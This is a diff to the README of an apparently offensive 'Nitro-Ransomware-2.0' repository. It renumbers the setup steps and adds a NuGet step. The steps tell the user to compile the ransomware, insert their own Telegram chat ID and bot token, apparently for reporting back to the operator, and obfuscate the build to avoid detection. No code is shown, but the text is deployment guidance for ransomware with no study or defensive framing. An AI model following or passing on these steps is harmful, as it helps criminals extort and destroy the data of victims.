ThunderboltDev/Nitro-Ransomware-2.0/README.md

 ## How to use
 1. Download VS 2022 or 2019 [RECOMMENDED 2019]
+2. Install Missing packages using nuget
-2. Edit Program and Replace CHATID with your telegram ID
+3. Edit Program and Replace CHATID with your telegram ID
-3. Go to Webhook.cs
+4. Go to Webhook.cs
-4. Replace string TelegramToken = "Telegram Token"; Put your telegram token here
+5. Replace string TelegramToken = "Telegram Token"; Put your telegram token here
-5. Compile and Done
+6. Compile and Done
 OBFUSCATION IS RECOMMENDED!

 ## Pictures: